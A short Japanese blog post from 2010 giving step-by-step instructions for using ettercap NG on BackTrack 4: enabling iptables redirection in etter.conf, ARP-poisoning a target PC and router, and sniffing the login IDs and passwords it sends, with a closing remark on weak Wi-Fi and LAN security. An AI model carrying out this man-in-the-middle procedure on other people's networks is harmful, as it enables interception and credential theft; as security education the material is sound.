2010年10月5日火曜日

ettercap NG

1.前準備

BackTrack 4 final、BackTrack 4 R1には ettercap NG が最初からインストールされているが、HTTPS をサポートするには openssl をインストールする必要がある。

$ apt-get install openssl

次に、/etc/etter.conf  の168と167行の #redir_ の先頭 # を削除する。
$ gedit /etc/etter.conf
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

2.操作手順
  1. ettercap起動
  2. sniff --> unified sniffing
  3. Network interface: wlan0 (Etherの場合 eth0又はeth1)
  4. Hosts --> scan for hosts
  5. Hosts --> Hosts List
  6. Add To target 1,Add To target 2 (ターゲットPC IPアドレスとルータ IPアドレスを選ぶ)
  7. Mitm --> Arp poisoning > Sniff remote connections > check (Arp poisoning 開始)
  8. Targets --> Current Targets
  9. View --> statistics
  10. Start --> Start sniffing (Arp poisoning中はそのまま)
    ターゲットPCでgoogleにログインすると、sniffing画面上にIDとPassが表示される。
  11. Mitm --> Stop mitm attack (ストップしないとARPテーブルが元に戻らない) 
3.結果

APがハッキングされると物の見事にIDとPassが盗まれてしまいます。
自分とこのAPで実際にやってみたら本当に簡単でした。これまで無線LANのセキュリティーは非常に脆弱だと認識はしていましたが、確実に防御しないととんでもないことになりますね。

ただ今回の、ettercapはローカルのLANでも同様な手法でIDとPassを盗めますので、ローカルLANへの接続もよく考えて行わないといけないようです。